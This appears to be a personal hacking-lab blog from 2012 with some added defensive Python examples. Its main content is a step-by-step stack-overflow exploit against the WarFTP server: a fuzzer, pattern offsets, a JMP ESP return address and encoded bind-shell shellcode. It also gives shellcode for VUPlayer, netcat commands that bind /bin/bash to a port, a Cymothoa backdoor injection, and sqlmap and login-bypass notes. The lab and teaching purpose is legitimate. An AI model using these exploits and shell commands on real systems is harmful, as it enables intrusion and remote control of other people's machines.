    buffer+=("\xda\xd8\xbf\x29\xf7\x72\x58\x31\xc9\xd9\x74\x24\xf4\x58\xb1\x51"
    "\x83\xc0\x04\x31\x78\x13\x03\x51\xe4\x90\xad\x5d\x60\xbe\x03\x75"
    "\x8c\xbf\x63\x7a\x0f\xcb\xf0\xa0\xf4\x40\x4d\x94\x7f\x2a\x4b\x9c"
    "\x7e\x3c\xd8\x13\x99\x49\x80\x8b\x98\xa6\x76\x40\xae\xb3\x88\xb8"
    "\xfe\x03\x13\xe8\x85\x44\x50\xf7\x44\x8e\x94\xf6\x84\xe4\x53\xc3"
    "\x5c\xdf\xb3\x46\xb8\x94\x9b\x8c\x43\x40\x45\x47\x4f\xdd\x01\x08"
    "\x4c\xe0\xfe\xb5\x40\x69\x89\xd5\xbc\x71\xeb\xe6\x8c\x52\x8f\x63"
    "\xad\x54\xdb\x33\x3e\x1e\xab\xaf\x93\xab\x0c\xc7\xb5\xc3\x02\x99"
    "\x47\xf8\x4b\xda\x8e\x66\x3f\x42\x47\x54\x8d\xe2\xe0\xe9\xc3\xad"
    "\x5a\xf1\xf4\x39\xa8\xe0\x09\x82\x7e\x04\x27\xab\xf7\x1f\xae\xd2"
    "\xe5\xe8\x2d\x81\x9f\xea\xce\xf9\x08\x32\x39\x0c\x65\x93\xc5\x38"
    "\x25\x4f\x69\x97\x99\x2c\xde\x54\x4d\x4c\x30\x3c\x19\xa3\xed\xa6"
    "\x8a\x4a\xec\xb3\x45\xe9\xf5\xcb\x52\xa6\xf6\xfd\x37\x59\x58\x54"
    "\x37\x89\x32\xf2\x6a\x04\x2a\xad\x8b\x8f\xff\x04\x8b\xe0\x68\x43"
    "\x3a\x87\x20\xdc\x42\x51\xe2\xb6\xe8\x0b\xfc\xe6\x82\xdc\xe5\x7f"
    "\x63\x65\xbd\x80\xbd\xc3\xbe\xae\x24\x86\x24\x28\xc1\x35\xc8\x3d"
    "\xf4\xd0\x42\x64\xde\xe8\xea\x71\x4a\xb5\x65\x9f\xba\xf5\x85\xf5"
    "\x43\xb7\x44\xf7\xfe\x14\x04\x8a\x85\x5c\x81\x3f\xd2\xf5\xa7\xc1"
    "\x96\x10\xb7\x48\x9d\xe3\x91\xe9\x4a\x4e\x4f\x5c\x24\x04\x6e\x0f"
    "\x97\x8d\x21\x50\xc7\x46\x6f\x77\xed\x58\x3c\x78\x38\x0e\x3c\x79"
    "\xf2\x30\x12\x0e\xaa\x32\x10\xd4\x31\x34\xc1\x86\x46\x1a\x86\x58"
    "\x61\x79\x24\xf7\x6e\xa8\x34\x27")
    file=open(filename,'w')
    file.write(buffer)
    file.close()

  • run VUPlayer without OllyDbg and load the fuzzer output
  • run a terminal on BackTrack and connect; type:
    root@bt:~# telnet 192.168.56.101 4444

======GOOD LUCK========

Sunday, 12 February 2012

Exploiting RM2MP3Converter

I will try to exploit RM2MP3Converter
A. Fuzzing
1. Make the fuzzer

#!/usr/bin/python
filename="test.wvx"
buffer='http://'
buffer+="\x41" * 50000
file=open(filename,'w')
file.write(buffer)
print "created successfully.."
file.close()

Monday, 6 February 2012

Wicd Problem

When running wicd there were no error messages, but wicd could not be used to connect to the internet.

After a search on Google I eventually found a tutorial:

1. Open a terminal and type
# dpkg-reconfigure wicd


2. Next, update the Wicd startup links
# update-rc.d wicd defaults


3. If there is an unprivileged user on BT, add that user to the netdev group (replace <username> with the user's name).

# usermod -a -G netdev <username>

Sunday, 5 February 2012

Buffer Overflow with the Direct RET Method

Buffer Overflow Direct RET

A. Fuzzing
1. Make a simple fuzzer using the Python language
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

 2.    Run the WarFTP application on Windows XP
choose the menu Properties → Start Service
to try connecting to the FTP server, use nc: 192.168.56.101 21
if it connects, the banner is: root@bt:~# nc 192.168.56.101 21
220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.

 3.    Run the fuzzer: root@bt:~# python fuzz.py
if the application closes on the desktop, it is working
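The fuzzers on this page (the USV line sent to BigAnt Server above and the USER line sent to WarFTP here) succeed because the server copies a command argument of any length into a fixed-size buffer. The Python 3 code below is an added example, not from the original post or from either product, of what the receiving side should do instead: validate a command line before anything is copied, and scan captured command lines for the oversized, non-printable or repeated-byte arguments these fuzzers produce. The limits MAX_ARG_LEN and MAX_REPEAT_RUN, the function names and the sample capture are assumptions constructed for the example.

```python
# Added example (not from the original post): input validation for a
# line-based TCP command service, plus a scan over captured command lines.
# The limits below are assumed values chosen for the example.
MAX_ARG_LEN = 128      # assumed per-argument cap, far below the 1000+ bytes the fuzzers send
MAX_REPEAT_RUN = 16    # assumed: a longer run of one byte is characteristic of fuzz input


def check_command(raw):
    """Validate one raw command line (bytes, CRLF-terminated).

    Returns (verb, argument) when the line is acceptable, or raises
    ValueError with the reason it must be rejected. Rejecting here, before
    the copy, is what prevents the strcpy-style overflow the posts trigger."""
    if not raw.endswith(b"\r\n"):
        raise ValueError("unterminated line")
    line = raw[:-2]
    if b"\r" in line or b"\n" in line or b"\x00" in line:
        raise ValueError("embedded CR, LF or NUL")
    if any(c < 0x20 or c > 0x7e for c in line):
        raise ValueError("non-printable byte in command")
    verb, _, arg = line.partition(b" ")
    if not verb.isalpha():
        raise ValueError("malformed verb")
    if len(arg) > MAX_ARG_LEN:
        raise ValueError("argument too long: %d bytes" % len(arg))
    return verb.upper().decode("ascii"), arg.decode("ascii")


def longest_run(data):
    """Length of the longest run of one repeated byte value in `data`."""
    best = run = 0
    prev = None
    for c in data:
        run = run + 1 if c == prev else 1
        prev = c
        best = max(best, run)
    return best


def scan_capture(lines):
    """Return [(index, reason)] for the command lines a defender should look
    at: anything check_command rejects, plus arguments that pass the length
    check but are dominated by one repeated byte."""
    findings = []
    for i, raw in enumerate(lines):
        try:
            _, arg = check_command(raw)
        except ValueError as e:
            findings.append((i, str(e)))
            continue
        if longest_run(arg.encode("ascii")) > MAX_REPEAT_RUN:
            findings.append((i, "repeated-byte argument"))
    return findings


# Constructed sample capture (not real traffic): two normal FTP commands, a
# WarFTP-style USER line of 1000 'A's, a BigAnt-style USV line carrying a
# NOP sled, a line with an embedded NUL, and a short but repetitive argument.
SAMPLE_CAPTURE = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"USER " + b"A" * 1000 + b"\r\n",
    b"USV " + b"\x90" * 100 + b"\r\n",
    b"USER ad\x00min\r\n",
    b"USER " + b"A" * 64 + b"\r\n",
]

if __name__ == "__main__":
    for index, reason in scan_capture(SAMPLE_CAPTURE):
        print("line %d: %s" % (index, reason))
```

check_command is the preventive control; scan_capture is the detection pass over traffic that has already been captured, and it reports both the lines check_command would have rejected and arguments that stay under the length limit yet consist of one repeated byte.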

B. Debugger
After this situation we now use OllyDbg on the WarFTP server application
 1.    run OllyDbg and open WarFTP; we will then see an error message
 2.    to prevent the error we delete the file FtpDaemon.DAT
 3.    run the WarFTP server application and make a dummy user via the User Security Properties button
 4.    repeat the fuzzer process with the WarFTP application running; the application runs normally
 5.    run the WarFTP server through OllyDbg
 6.    after WarFTP is running, we run the fuzzer application on BackTrack

 C.    Metasploit Framework
1. Open a terminal on BackTrack and type: root@bt:~# cd /pentest/exploits/framework/tools
2. To get 1000 bytes of data, I type: root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000 > string_pattern.txt
It shows the string "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"

 3.    put the string pattern into the fuzzer application and edit it
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
#buffer="\x41"*1000
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

4. After editing, the next step is running the fuzzer against the WarFTP server. We run WarFTP in OllyDbg again and look at the registers it shows.

 5.    make the pattern offset
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 32714131
485
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb q4Aq5Aq
493
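The three pattern_create.rb / pattern_offset.rb steps on this page (BigAnt Server and VUPlayer above, and the WarFTP offsets just shown) all rely on the same cyclic-pattern idea: every 3-character group is unique within the first 20280 characters, so the 4 bytes the debugger shows in EIP, in the SEH handler or at ESP identify exactly where in the input they came from. The Python 3 code below is an added example, not from the original post and not Metasploit's own code, that reimplements that crash-triage step and checks its results against the offsets reported on this page (966, 1012, 1016, 485 and 493). The function names, the 8-hex-digit register convention and the constructed register dump are the example's own assumptions.

```python
# Added example (not from the original post): a Python 3 reimplementation of
# the cyclic pattern that pattern_create.rb / pattern_offset.rb use, applied
# to the crash values reported in this page's posts.
import itertools
import string

# The pattern is the sequence of 3-character groups Upper+lower+digit in
# lexicographic order: Aa0 Aa1 ... Aa9 Ab0 ... Zz9. Every 3-character window is
# unique for 26*26*10*3 = 20280 characters; beyond that it repeats and offsets
# become ambiguous, so pattern_create refuses longer patterns.
MAX_UNIQUE = (len(string.ascii_uppercase) * len(string.ascii_lowercase)
              * len(string.digits) * 3)


def pattern_create(length):
    """Return the first `length` characters of the cyclic pattern."""
    if not 0 <= length <= MAX_UNIQUE:
        raise ValueError("length must be between 0 and %d" % MAX_UNIQUE)
    groups = ("".join(g) for g in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits))
    out = []
    total = 0
    for g in groups:
        if total >= length:
            break
        out.append(g)
        total += 3
    return "".join(out)[:length]


def _register_to_text(value):
    """Interpret an 8-hex-digit register dump (e.g. EIP = 42326742) as the
    4 little-endian bytes it was loaded from and return them as text, or None
    if those bytes are not ASCII (then they cannot come from the pattern)."""
    raw = int(value, 16).to_bytes(4, "little")
    try:
        return raw.decode("ascii")
    except UnicodeDecodeError:
        return None


def pattern_offset(query, length=MAX_UNIQUE):
    """Return the offset at which `query` appears in the pattern, or -1.

    `query` may be the 8-hex-digit value of a register as shown by the
    debugger (tried first, little-endian, as pattern_offset.rb does) or a
    literal fragment of the pattern such as "q4Aq5Aq". A literal fragment
    that happens to look like hex falls back to the literal search."""
    pattern = pattern_create(length)
    if len(query) == 8 and all(c in string.hexdigits for c in query):
        text = _register_to_text(query)
        if text is not None:
            pos = pattern.find(text)
            if pos != -1:
                return pos
    return pattern.find(query)


def register_offsets(registers, length=MAX_UNIQUE):
    """Map register name -> hex value (as read from a crash dump) to the
    pattern offset each one holds, keeping only registers that contain
    pattern bytes. Shows at a glance which parts of the input reached EIP,
    the SEH handler or ESP."""
    found = {}
    for name, value in registers.items():
        off = pattern_offset(value, length)
        if off != -1:
            found[name] = off
    return found


if __name__ == "__main__":
    # Constructed crash dump: EIP as the BigAnt post reports it, plus a
    # made-up ESP value that holds no pattern bytes.
    print(register_offsets({"EIP": "42326742", "ESP": "0012ff40"}))
```

The BigAnt value 42326742 decodes little-endian to "Bg2B", which sits at offset 966; the VUPlayer value 68423768 decodes to "h7Bh" at 1012; and the WarFTP value 32714131 decodes to "1Aq2" at 485, matching the outputs of pattern_offset.rb shown on this page. Requesting a pattern longer than 20280 characters is refused rather than silently producing duplicate windows.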

 6.    edit the fuzzer
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x90"*485
buffer+="\xEF\xBE\xAD\xDE"
buffer+="\x90"*(493-len(buffer))
buffer+="\xCC"*(1000-len(buffer))
s.connect(('192.168.56.101',21))
data=s.recv(1024)
print("Sending evil data via USER command..")
s.send('USER '+buffer+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

 7.    once more run the WarFTP server in OllyDbg and run the fuzzer application, then look at the value in the EIP register

 8.    edit the fuzzer script

#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer= "\x90" * 485
buffer+= "\xD7\x30\x9D\x7C"
buffer+= "\xCC" * (493-len(buffer))
buffer+= "\xCC" * (1000 - len(buffer))
s.connect(('192.168.56.101', 21))
data = s.recv(1024)
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS PASSWORD' +'\r\n')
s.close()

 9.    now run WarFTP through OllyDbg and run the fuzzer application

 D.   JMP ESP
1.     run the application using OllyDbg. On the View menu choose the sub-menu Executable modules

 2.    OllyDbg shows a new window named Executable modules, which lists the libraries loaded inside the WarFTP server while it is running.

 3.    Choose the file shell32.dll, which we will use to get out of the EIP register

 4.    double-click shell32.dll and OllyDbg shows a new CPU window

 5.    search for JMP ESP inside shell32.dll: right-click in the main window -> Search for → Command

 6.    Enter JMP ESP in the Find command window and press the Find button

 7.    OllyDbg finds the address of a JMP ESP in the memory of the shell32.dll file
7C9D30D7 FFE4 JMP ESP

 8.    After finding the JMP ESP address in the application memory, the next step is to change the value of EIP by editing the fuzzer script:
#!/usr/bin/python
# Python 2 script (str is bytes); 485 and 493 are the offsets found in step 5
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer= "\x90" * 485                    # padding up to the saved return address
buffer+= "\xD7\x30\x9D\x7C"             # 0x7C9D30D7, the JMP ESP address found in step 7, little-endian
buffer+= "\xCC" * (493-len(buffer))     # int3 filler up to where ESP points
buffer+= "\xCC" * (1000 - len(buffer))  # int3 filler up to 1000 bytes
s.connect(('192.168.56.101', 21))
data = s.recv(1024)
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS PASSWORD' +'\r\n')
s.close()

9. Now run WarFTP under OllyDbg and run the edited fuzzer application. If everything goes smoothly, the WarFTP server's instruction pointer lands in our buffer in memory.

E. Payload
1. Make the payload with msfweb

- Open a terminal and type:
root@bt:~# cd /pentest/exploits/framework2/
root@bt:/pentest/exploits/framework2# ./msfweb
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

127.0.0.1:55555

- Open the browser at that address to show msfweb

- Choose the Payloads button and filter the modules to os::win32

- Choose Windows Bind Shell and input:
DATA : process
PORT : 4444
Restricted Character : 0x00 0x0a 0x0d
Select Encoder : Msf::Encoder::ShikataGaNai

- Press Generate Payload

- Paste the payload code into the fuzzer application and edit it:
#!/usr/bin/python
# Python 2 script (str is bytes)
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer= "\x90" * 485   # padding up to the saved return address
buffer+= "\x90" * 32   # NOP sled
# encoded Windows Bind Shell payload generated by msfweb (as pasted in the original post)
buffer+="\xda\xc0\xbf\x32\xa5\x05\xfa\x33\xc9\xb1\x15\xd9\x74\x24\xf4\x5b"
buffer+="\x31\x7b\x17\x03\x7b\x17\x83\xd9\x59\xe7\x0f\x77\xc3\xb0\x76\xd5"
buffer+="\x6b\x51\x8b\xc8\x37\xd8\x6a\xb8\x85\x88\x2e\x6e\x60\x3d\x62\x0e"
buffer+="\xed\xae\x2d\x5d\x5c\xbb\xa5\x39\xad\xbb\x86\xd3\xe0\x3c\xb4\x70"
buffer+="\xa9\x8c\x27\xbb\xcd\x7a\x3d\x41\x97\xee\x98\x1d\x76\xb8\x4d\x50"
buffer+="\xf8\x0f\x17\x9f\xa9\xe7\xc8\x70\x39\x90\x7e\xa1\xdf\x09\x11\x34"
buffer+="\xfc\x9a\xb9\x15\x50\xab\x79\x54\xd6"
s.connect(('192.168.56.101', 21))
data = s.recv(1024)
s.send('USER '+buffer+'\r\n')
data = s.recv(1024)
s.send('PASS PASSWORD' +'\r\n')
s.close()

- Run WarFTP without OllyDbg on the Windows XP system and run the fuzzer application from the BackTrack terminal

- Run telnet to connect from BackTrack to Windows XP through port 4444:
root@bt:~# telnet 192.168.56.101 4444
Trying 192.168.56.101...
telnet: Unable to connect to remote host: Connection refused

I haven't succeeded in connecting with telnet, so I will try harder to connect.

OLLYDBG

OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries. Version 1.10 is the final 1.x release.
Version 2.0 has recently been released, and OllyDbg has been rewritten from the ground up in this release. The software is free of cost, but the shareware license requires users to register with the author. The current version of OllyDbg cannot always disassemble binaries compiled for 64-bit processors, though a 64-bit version of the debugger has been promised.
OllyDbg is often used for reverse engineering of programs. It is often used by crackers to crack software made by other developers. For cracking and reverse engineering, it is often the primary tool because of its ease of use and availability. It is also useful for programmers to ensure that their program is running as intended.

INSTALL OLLYDBG IN WINDOWS XP


The steps:
  1. Download OllyDbg
  2. Extract the file
  3. Open the extracted OllyDbg folder and run ollydbg.exe

Saturday, 04 February 2012

Memory Register

A register is a small piece of memory inside the microprocessor that can be accessed at very high speed. The microprocessor always uses registers as intermediaries when doing its work, so registers can be likened to the microprocessor's hands and feet.

An Intel x86-based CPU has 8 general-purpose registers: EAX, EDX, ECX, ESI, EDI, EBP, ESP and EBX.

The EAX register is used to perform calculations and to hold the value returned from a function call. Basic operations such as add, subtract and compare are optimized for the EAX register. Special operations such as multiplication and division also use only the EAX register.

EDX is the data register. Basically it is an extension of EAX that helps hold additional data for complex operations. It can also be used for general-purpose data storage.

The ECX register, also called the count register, is used for loop operations, such as counting or processing strings.

The ESI and EDI registers are relied upon by loops that process data. ESI is the source index (the S in ESI means Source) for operations on data and holds the location of the input data stream. EDI points to the location where the output data of the operation is stored; it is the destination index (the D in EDI means Destination).


ESP is the stack pointer register and EBP is the base pointer register. These registers manage function calls and stack operations. When a function is called, its arguments are pushed onto the stack, followed by the return address. ESP points to the top of the stack, so it will point to the return address, while EBP is used to refer to the bottom of the call stack.

The EBX register is the only register not designed for anything special; it is used as extra storage.

The EIP register points to the instruction currently being executed. While the CPU works through the binary, EIP is continually updated to reflect the location where execution is happening.

Fuzzing

Fuzzing, or fuzz testing, is a software testing technique used to find security problems in software or computer systems. It is often automated or semi-automated, and involves providing invalid, unexpected, or random data to the inputs of a computer program.

Thursday, 02 February 2012

Using netcat in Ubuntu



The first step:
In Ubuntu, input:
#nc -l -p 1234 -e /bin/bash

In BackTrack, input:
:nc 192.168.56.101 1234
*copying nc to Ubuntu:
:cp /bin/nc.1 /var/www

Wednesday, 01 February 2012

Dump DVWA with sqlmap

1. Activate Apache and MySQL from the BackTrack applications menu
2. Open your browser and type localhost/dvwa

Change the DVWA security level

and input a variable, then look at the Tamper Data output.


Bypass from FBIP

1. I type localhost/fbpi to browse the page
2. Then I go through to the login form




3. Finally I get through to the web page without a username and password (bypass)

Editing Cymothoa

1. On the BackTrack console type:
#nc -l -v -p  11610 -e > cy /bin/bash
listening on [any] 11610 ...
192.168.56.1 inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.101] 55767

2. Generate the backdoor using cymothoa in BackTrack
command: ./cymothoa -p 1844 -s 0 11

Netcat mk fifo

1. I use the filename newbiefile, then type the command: mkfifo newbiefile
then type the command: nc -lk 1234 < newbiefile | /bin/bash >newbiefile


2. Run from the server using the existing command: nc 192.168.56.1 1234

Advanced information gathering

http://www.4shared.com/file/i-bBLRYO/detikscan.html

The difference between SQL injection and blind SQL injection


An SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website to perform operations on the database (often to dump the database content to the attacker) other than the usual operations as intended by the designer. SQL injection is a code injection technique that exploits a security vulnerability in a website's software.
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.
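An added example (not part of the original post) on a constructed SQLite table: the string-built query the text calls badly designed next to its parameterised fix, and a check that models the blind case, namely whether the page answers differently to an injected true condition and an injected false condition.

```python
import sqlite3

# Constructed sample database for the demonstration (not from the original post).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "alice", "s3cret"), (2, "bob", "hunter2")])


def lookup_unsafe(user_id):
    """The badly designed version: the request value is pasted into the SQL text,
    so quotes and operators inside it become part of the statement."""
    sql = "SELECT name FROM users WHERE id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(user_id):
    """The fix: the value is bound as a parameter and can only ever be data."""
    return conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchall()


def page_shows_user(lookup, user_id):
    """Model a 'blind' page: it displays no data, only whether a user was found."""
    return len(lookup(user_id)) > 0


def leaks_boolean_oracle(lookup):
    """Regression check for the blind case: an injected true condition and an
    injected false condition must not change what the page shows."""
    true_case = page_shows_user(lookup, "1' AND '1'='1")
    false_case = page_shows_user(lookup, "1' AND '1'='2")
    return true_case != false_case


if __name__ == "__main__":
    print("string-built query leaks an oracle:", leaks_boolean_oracle(lookup_unsafe))  # True
    print("parameterised query leaks an oracle:", leaks_boolean_oracle(lookup_safe))  # False
```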

TOR (The Onion Router)


Tor (short for The Onion Router) is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers in order to conceal a user's location or usage from anyone conducting network surveillance or traffic analysis. Using Tor makes it more difficult to trace Internet activity, including "visits to Web sites, online posts, instant messages and other communication forms", back to the user, and is intended to protect users' personal freedom, privacy, and ability to conduct confidential business by keeping their internet activities from being monitored.
"Onion routing" refers to the layered nature of the encryption service: The original data are encrypted and re-encrypted multiple times, then sent through successive Tor relays, each one of which decrypts a "layer" of encryption before passing the data on to the next relay and, ultimately, its destination. This reduces the possibility of the original data being unscrambled or understood in transit.
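An added example, not from the original post, of the layered encryption described above: the client wraps the message once per relay and each relay peels a single layer, learning only its next hop. The per-hop cipher here is a toy HMAC-SHA256 keystream standing in for Tor's real ciphers, and the relay names, keys and destination are constructed for the demonstration.

```python
import hashlib
import hmac
import os

def keystream_xor(key, nonce, data):
    """Toy stream cipher (HMAC-SHA256 counter keystream): a stdlib-only stand-in
    for the real per-hop ciphers, present only so the layering can be shown."""
    stream = bytearray()
    for counter in range((len(data) + 31) // 32):
        stream += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
    return bytes(a ^ b for a, b in zip(data, stream))

def wrap(key, plaintext):
    nonce = os.urandom(8)
    return nonce + keystream_xor(key, nonce, plaintext)

def unwrap(key, blob):
    return keystream_xor(key, blob[:8], blob[8:])

def build_onion(route, destination, payload):
    """Client side. route = [(relay_name, key), ...] from entry to exit. The exit
    layer is built first; each earlier layer wraps 'next hop | inner layer'."""
    layer = wrap(route[-1][1], b"DEST:" + destination + b"|" + payload)
    for (_, key), (next_name, _) in zip(reversed(route[:-1]), reversed(route[1:])):
        layer = wrap(key, b"NEXT:" + next_name + b"|" + layer)
    return layer

def relay_process(key, blob):
    """One relay peels one layer: it learns the next hop or, at the exit, the destination."""
    plain = unwrap(key, blob)
    target, _, inner = plain[5:].partition(b"|")
    return plain[:4].decode(), target, inner

def traverse(route, onion):
    """Pass the onion through every relay in order, recording what each one learns."""
    seen, blob = [], onion
    for name, key in route:
        kind, target, inner = relay_process(key, blob)
        seen.append((name, kind, target))
        if kind == "DEST":
            return seen, target, inner
        blob = inner
    raise ValueError("ran out of relays before reaching the exit layer")

if __name__ == "__main__":
    # Constructed relays, keys and destination for the demonstration.
    route = [(b"guard", os.urandom(32)), (b"middle", os.urandom(32)), (b"exit", os.urandom(32))]
    onion = build_onion(route, b"example.org:80", b"GET / HTTP/1.0\r\n\r\n")
    for view in traverse(route, onion)[0]:
        print(view)  # guard learns only 'middle', middle only 'exit', exit the destination
```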